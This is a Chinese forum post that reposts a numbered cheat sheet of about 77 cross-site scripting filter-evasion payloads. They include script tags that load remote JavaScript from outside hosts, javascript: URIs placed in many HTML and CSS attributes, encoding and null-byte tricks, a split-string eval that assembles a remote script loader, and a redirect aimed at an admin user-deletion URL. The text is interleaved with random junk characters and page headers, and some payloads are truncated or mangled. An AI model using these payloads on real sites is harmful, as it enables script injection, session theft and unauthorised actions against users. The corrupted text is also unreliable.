貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
) B" B7 v& T9 S- t: u(1)普通的XSS JavaScript注入
9 T1 P4 T2 D1 Y+ a2 u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 Q! h% D4 }! }' n( v1 s7 }8 D7 K(2)IMG标签XSS使用JavaScript命令
6 ~# Y, p& g4 S0 v8 W# j9 g<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 d0 y% w# u: s+ H L4 [1 L5 ^
(3)IMG标签无分号无引号5 B% K6 c% t* i5 [, r2 L- c
<IMG SRC=javascript:alert(‘XSS’)>( L) C- z) c) k
(4)IMG标签大小写不敏感
- o% i7 c# }2 w7 @& A0 n<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" k1 T) k0 F9 _5 x4 ?(5)HTML编码(必须有分号)
% v: q, f# |+ W% `<IMG SRC=javascript:alert(“XSS”)>
1 @1 G, N. A3 V+ k+ h a4 ?$ T(6)修正缺陷IMG标签, p7 B$ N4 U. b! S1 v, O3 J& K
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>) |- ?, M4 }, ^5 l" U
' v2 y! P$ Y* e2 b* @7 b
0 t$ }: Q7 n2 \4 `* o& Y$ p5 m/ {
(7)formCharCode标签(计算器)
; e& E* E8 G7 @! ]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 ?6 I/ y4 o) c" P- `' G! F- e(8)UTF-8的Unicode编码(计算器)0 F: P* y/ i. F( G+ E
<IMG SRC=jav..省略..S')>9 K5 z# \, k+ ~" j; v
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ X7 u) t0 K: R- r8 T
<IMG SRC=jav..省略..S')>7 d F3 k+ i6 f' w/ b
(10)十六进制编码也是没有分号(计算器) {, l5 K) a! H* e/ L" @
<IMG SRC=java..省略..XSS')>. g$ @" O1 ], o! \
(11)嵌入式标签,将Javascript分开
9 V2 V. i5 v9 n) B5 t) M0 D7 b<IMG SRC=”jav ascript:alert(‘XSS’);”>
' h& d) _4 q2 y. M1 c3 ?8 s% K7 F(12)嵌入式编码标签,将Javascript分开, F1 D d0 P, h# A( V
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; W7 {# s8 T9 ?(13)嵌入式换行符; X: X% \! z( V2 [
<IMG SRC=”jav ascript:alert(‘XSS’);”>; h1 N6 {; s4 l% q5 W2 { v
(14)嵌入式回车5 E* b9 c7 u* _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& B1 }$ {1 O+ w. x0 Y% A4 z(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 }, _3 |7 N; g) }; I) W+ N* t<IMG SRC=”javascript:alert(‘XSS‘)”>+ a( L7 J& u# O
(16)解决限制字符(要求同页面)4 c* ^1 ~4 j$ E3 o3 P( a
<script>z=’document.’</script>
1 x" m. n2 \1 [( ]% O" |8 A" k<script>z=z+’write(“‘</script>0 M+ G5 q* y& @- t, p2 @
<script>z=z+’<script’</script>
% U: c1 f+ `. T! E<script>z=z+’ src=ht’</script>" N& U+ l9 p9 X9 L; c
<script>z=z+’tp://ww’</script>& V7 H7 t) t b, x' k6 B2 S. A+ _' y
<script>z=z+’w.shell’</script>
^! B, i% u% u5 A' T% q7 ^% ]<script>z=z+’.net/1.’</script>" ]' C7 C. _( M2 D1 ]3 o
<script>z=z+’js></sc’</script>. N. G' P, X8 }1 S9 G, G4 Z
<script>z=z+’ript>”)’</script>4 c, S* k$ g: F5 [! N- }
<script>eval_r(z)</script>
( F% L# X) Y2 K6 g" B: g& H(17)空字符12-7-1 T00LS - Powered by Discuz! Board% l0 `9 @, @4 l; l; L( b7 k
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
& A& X, Q. ?9 M! xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- j' ~- g, W' e7 w(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 M5 k7 p a! j' T
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ H( W4 v/ ]$ D8 G4 `1 j% a; ?2 Z
(19)Spaces和meta前的IMG标签
" a+ e; h7 X; q0 _* N) z<IMG SRC=” javascript:alert(‘XSS’);”>
, [% a D" w; {& N4 g+ o+ f) A(20)Non-alpha-non-digit XSS
( e) @ O/ q# x: N<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 ~' Q4 y4 F* E- t1 I- m9 w4 `( A. u
(21)Non-alpha-non-digit XSS to 2/ f) l1 q7 a! S9 C$ @
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 J+ u0 G. h! r/ S( ~3 ~(22)Non-alpha-non-digit XSS to 3$ s2 P( {' b, f9 F# i, y$ l4 K) y
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ h7 q ?: f2 O6 g; M6 W(23)双开括号0 E% {+ ?+ f4 X, V2 o1 r" @" N
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 `$ _$ T& C0 B* I- m* E(24)无结束脚本标记(仅火狐等浏览器)
" R6 x/ N. e2 ^& n* i7 R<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- |2 w0 _7 u- i) U: H(25)无结束脚本标记24 _- L7 Z: T- V( |5 a- N2 z
<SCRIPT SRC=//3w.org/XSS/xss.js>
: S, V& \* f/ j$ l(26)半开的HTML/JavaScript XSS
) d3 @6 ]% P% j; ^! C<IMG SRC=”javascript:alert(‘XSS’)”
$ s# X- L; u$ U$ x+ k' C' D(27)双开角括号
. P a2 ^% x; ~+ |) L<iframe src=http://3w.org/XSS.html <
& U" c. m6 O, s% S" P# J1 }(28)无单引号 双引号 分号
; w. P& p' Z! Q<SCRIPT>a=/XSS/
r6 L5 l: a5 k! a- E6 D( aalert(a.source)</SCRIPT>4 I0 L4 [# l) {9 ?+ V5 @
(29)换码过滤的JavaScript
' f: @' @5 l+ N' @\”;alert(‘XSS’);//% y/ s# h( y l# I
(30)结束Title标签6 m) f# W" X3 |+ W3 [: i
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
. P0 T4 V2 O6 A( @ W(31)Input Image! }6 c9 k7 w& t# Q4 r6 M6 x
<INPUT SRC=”javascript:alert(‘XSS’);”>- \: x8 p! m* s
(32)BODY Image
3 b4 D5 F/ b5 h& X& r; F<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 C* c! J5 f. ^6 [(33)BODY标签" S1 h+ D0 W/ N1 @
<BODY(‘XSS’)>
- J3 t ^* C. C1 g6 A6 V(34)IMG Dynsrc
1 v: U% r$ C1 ~6 d<IMG DYNSRC=”javascript:alert(‘XSS’)”>
2 q6 z4 E9 _, x F4 R" a(35)IMG Lowsrc
7 [" V4 N- F; e<IMG LOWSRC=”javascript:alert(‘XSS’)”>
7 q1 X' c. w* l2 P1 j(36)BGSOUND
8 z: \3 q) `1 M! H<BGSOUND SRC=”javascript:alert(‘XSS’);”> _# E% }4 k! h5 i
(37)STYLE sheet p( C# K, V8 y/ V. h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ H/ c l9 _ r4 M( W
(38)远程样式表
! k2 S: V1 @1 V7 t& U% e, c<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! u3 k, [! x! O# ]3 h+ w
(39)List-style-image(列表式), v- f& u6 A2 ?4 J8 n8 _9 {
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; n. a6 c4 j* g x4 Q(40)IMG VBscript
s6 [& N4 q* ^- D, ~<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS; }7 n o5 p" Z) X! p- f! u
(41)META链接url
5 e; p! @, Q( m ?) \. x0 m2 h
( `# u/ w$ e. P2 X' u$ n! A# c9 b" _) ^) E, e4 X7 h! w/ q- r* j
<META HTTP-EQUIV=”refresh” CONTENT=”0;
$ B* [+ \8 k& q; \1 V0 WURL=http://;URL=javascript:alert(‘XSS’);”>0 U- p3 y/ H! J% f9 L# ^! J- C! q; z
(42)Iframe
6 m% }1 Z9 W( p+ H/ k2 a<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 }" n. b: C( t" a; ~(43)Frame
2 N; ^: M" }6 I+ Z<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
6 x! V' M. ~& ?! q8 P( |https://www.t00ls.net/viewthread ... table&tid=15267 3/6
. y+ q) n% c6 D" J+ t8 B1 |(44)Table- Q3 \/ m* F; l# w5 a$ }
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>: V! I' i8 {( W0 `7 Q* H
(45)TD: X q+ B' R1 e/ |# X1 g: I
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
h) x3 t$ c7 H7 S! i9 u, T(46)DIV background-image
1 w# X# U4 k9 m# Y' G<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 ^& }, P9 Q' T; p7 L(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
6 T r) R5 Z/ i! V2 j8&13&12288&65279)
3 k9 O) ?) x7 p/ @# E<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ J* Y# d3 s; H; q9 d" x6 ](48)DIV expression
( g# p# E% y, x" v% ^% a Q o1 X4 Z# ]<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 b: r0 I! j+ N/ q5 l, X% d(49)STYLE属性分拆表达
% L _8 d' c. D( m4 u; o<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# j: v9 F9 E5 L* t(50)匿名STYLE(组成:开角号和一个字母开头)
' D- S/ L) a3 ?2 }# F8 U w<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>. E7 e- X8 j }" z9 O; |2 C
(51)STYLE background-image
3 x' R& r+ m) a& A- J! |$ v8 ~5 D<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
" Z5 r7 B3 {$ }" `1 m7 U1 l5 |' [CLASS=XSS></A>+ u; p V. A9 m) y' M$ s c& r* s# Q& B
(52)IMG STYLE方式
" H/ @& |- l3 Z% @( l* [8 o4 Q* nexppression(alert(“XSS”))’># Y2 s) I+ ~8 S* C0 ^+ t k4 F5 |
(53)STYLE background
$ z4 K+ S9 K( \/ e" X: N<STYLE><STYLE l( c @: i j: M" g' M( Q! @
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 B9 M' g( c2 U2 o3 C. r(54)BASE) u7 s# w6 x- |' m) \& r
<BASE HREF=”javascript:alert(‘XSS’);//”>4 | G* F& L, O' i* U9 A" T
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS7 r. z A0 X2 }/ D
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>1 b) t ]$ S2 ]$ u8 b) f% H
(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 p$ W" G1 S! ?9 n3 i* F3 ea=”get”;
) w# G1 d6 a: B* `3 [; Vb=”URL(\”";
6 _/ m6 \0 n+ `1 ^% b2 lc=”javascript:”;( o* z( a& C; l- b( g7 C
d=”alert(‘XSS’);\”)”;# f& Q: S: Z* N$ o0 G. z# m
eval_r(a+b+c+d);* y' u5 X+ ~8 [& ~4 o. p. n
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ T- h) R* c- ~: }/ s
<HTML xmlns:xss>
" I1 E0 g- |" t" ^% Y6 }<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>3 @. W, l p7 C) u2 }( u7 {
<xss:xss>XSS</xss:xss>
! ]( ?( B5 A4 r2 a2 C7 d</HTML># i$ |: Z4 E$ n/ p
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用6 a& a" D! s9 A" |% |- R8 D
<SCRIPT SRC=””></SCRIPT>
! m7 x) I- g- E, U(59)IMG嵌入式命令,可执行任意命令+ |8 m( {' y* L
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
" a* E8 i% d" Z4 n( a" \) @) k6 [(60)IMG嵌入式命令(a.jpg在同服务器)2 Q" F/ _( W0 \/ n ?
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
$ A1 ]# S8 Z ~; o3 H(61)绕符号过滤
$ q9 _6 }4 H: M" `, |, B3 X<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>" _! {! Q7 R1 H: N6 N
(62)2 s5 o: ~2 m( G( k) A6 f% E" i
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, J! H; ?. K9 ]7 x
(63)
$ `+ q+ H, ^1 e! {5 j) P1 _3 z<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& R6 l$ x: q9 r$ Y7 y# Y: i) X8 ?(64)8 h# m( b: N. a L$ T
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
0 Q" d! [: g2 j% @2 ^, V- \(65)) L+ t3 H0 ^% o3 a
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ t- Q9 q. E) d$ n- C(66)12-7-1 T00LS - Powered by Discuz! Board' P) T# `* t- y" P. L
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
8 y) U6 _1 F) ^" w4 Z0 k2 |7 W<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( c+ h3 S# C6 e
(67)8 e5 A$ Z9 V. z% p7 Q, {
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
- ]" T( j S6 Q6 Z</SCRIPT>5 S6 s# m" a% Z
(68)URL绕行) A4 W5 {' C) b1 [' A
<A HREF=”http://127.0.0.1/”>XSS</A>
1 {- H* c& D; a% P(69)URL编码1 C8 S% d8 u9 P8 g/ ^( \ D" J
<A HREF=”http://3w.org”>XSS</A>4 _+ a6 O, G9 P K- z+ n
(70)IP十进制
5 E0 h; m7 e, h: W- s( m<A HREF=”http://3232235521″>XSS</A>7 z F+ `) }! z$ }0 b7 a3 ?/ E
(71)IP十六进制
. y* J2 a' ~ {<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 M f9 T1 B. n Q( ?(72)IP八进制
8 {& w9 L* L& I: x" D% p9 p* F, D<A HREF=”http://0300.0250.0000.0001″>XSS</A>
( D- o( [% `2 p; S1 o4 P, Y(73)混合编码
7 ? Z/ C& x2 g) ]2 {8 a<A HREF=”h
# w! Y( h1 Q1 B; U: Qtt p://6 6.000146.0×7.147/”">XSS</A>
8 \* h) I, t: L(74)节省[http:]
3 V( t; Z' p9 l9 s- |# W( L/ N( n<A HREF=”//www.google.com/”>XSS</A>5 A+ p1 b! {1 f G
(75)节省[www]* k' O* u8 B" X0 o$ [& O) M
<A HREF=”http://google.com/”>XSS</A>
4 v: a* Z7 J; z0 h- e, N(76)绝对点绝对DNS
) V6 e0 h6 P. L- k<A HREF=”http://www.google.com./”>XSS</A>( l( d, e. T7 ^1 e) A/ D
(77)javascript链接
c/ b" j5 R4 W# X- Y& Q& Y |) I<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>) K+ i4 J& N- T5 c! C1 i) W/ L s
2 }$ q) u1 e8 _- |6 e$ m) m
原文地址:http://fuzzexp.org/u/0day/?p=14
* c4 o6 V' H/ Z* n7 E7 E5 o p+ Y% p. j7 q
|
发表于 2013-4-19 19:22:37
收藏
支持
反对